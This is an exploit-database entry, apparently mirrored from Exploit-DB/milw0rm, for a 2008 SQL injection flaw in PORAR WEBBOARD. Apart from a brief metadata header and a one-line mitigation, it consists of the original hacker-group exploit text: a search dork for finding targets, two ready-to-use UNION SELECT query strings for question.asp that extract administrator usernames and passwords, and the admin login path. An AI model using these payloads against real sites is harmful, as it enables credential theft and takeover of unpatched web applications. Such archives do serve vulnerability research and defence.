PORAR WEBBOARD SQL Injection Vulnerability

vendor:

WEBBOARD

by:

xcorpitx

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: WEBBOARD

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

PORAR WEBBOARD SQL Injection Vulnerability

This vulnerability allows an attacker to inject malicious SQL queries into the vulnerable web application. This can be used to gain access to the administrator's credentials and gain access to the web application.

Mitigation:

Input validation should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

  ##     ##     
   ##   ##      
    ## ##
     ###CoRPITX 
     ###     
    ## ##
   ##   ##
  ##     ##

########################### Turkey ####################################
#                                                                     #
#################### www.Hayalet-hack.com #############################
#
##################### www.zone-turk.net/###############################
#             
#            PORAR WEBBOARD SQL Injection Vulnerability 
#
#######################################################################
#  
#  AUTHOR : xcorpitx
#
#  HOME   : www.Hayalet-hack.com / www.zone-turk.net
#
#  email  : xcorpitx@hotmail.com
#
########################################################################
#  This (SQL) give  Admin name and Admin password 
#  Bu sorgu direk admin ismi ve  sisresini verecektir
########################################################################
#
#  DorK   : '' webboard question.asp QID''
#
########################################################################
#            
#  EXPLOIT: 
#
########################################################################
# example 1  : columns number 10
#
question.asp?QID=-1122334455%20+%20union%20+%20select%20+%200,null,2,username,password,5,password,7,8,9,null%20+%20from%20+%20+%20administrator%20';';
#########################################################################
# some tÃ½mes thÃ½s sql
# example 2 : columns number 11
#
question.asp?QID=-1%20+%20union%20+%20select%20+%200,1,2,username,4,5,password,7,8,9,10,11%20+%20from%20+%20+%20administrator%20';';
#########################################################################
# admin login
#
http://www.xxx.com/webboard/admin/login.asp
#
########################################################################

Thanx : str0ke,D3ng3s!z,Pc faresi,Hayalet,Turque,SmoKin,Apex,Mostbiq

have nice day and hack 

i m sory jane  :( 


Kankilerim   D3ng3s!z ve Pc faresi ne sevgiler  el sallayin :S

# milw0rm.com [2008-02-25]